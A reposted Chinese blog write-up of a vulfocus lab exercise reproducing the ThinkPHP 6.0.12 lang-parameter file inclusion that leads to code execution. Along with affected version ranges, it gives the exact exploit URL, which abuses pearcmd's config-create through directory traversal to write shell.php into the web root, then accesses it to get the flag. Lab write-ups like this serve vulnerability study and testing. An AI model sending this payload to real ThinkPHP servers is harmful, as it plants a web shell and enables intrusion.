vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)
目录
2,将phpinfo写到网站根目录下/var/www/html
描述(来自vulfocus):
ThinkPHP 是一个快速、简单的面向对象的轻量级 PHP 开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。
如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。
漏洞介绍(来自vulfocus):
在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。
虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件
访问路径诶:/public/index.php
影响版本:
0.1 < ThinkPHP≤ 6.0.13
0.0 < ThinkPHP≤ 5.0.12
1.0 < ThinkPHP≤ 5.1.8
复现:
1,打开靶场,显示没有权限bp拦截
2,将phpinfo写到网站根目录下/var/www/html
public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/+/var/www/html/shell.php
3,访问shell.php
4,拿到flag
来源地址:https://blog.csdn.net/m0_71518346/article/details/128360317
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
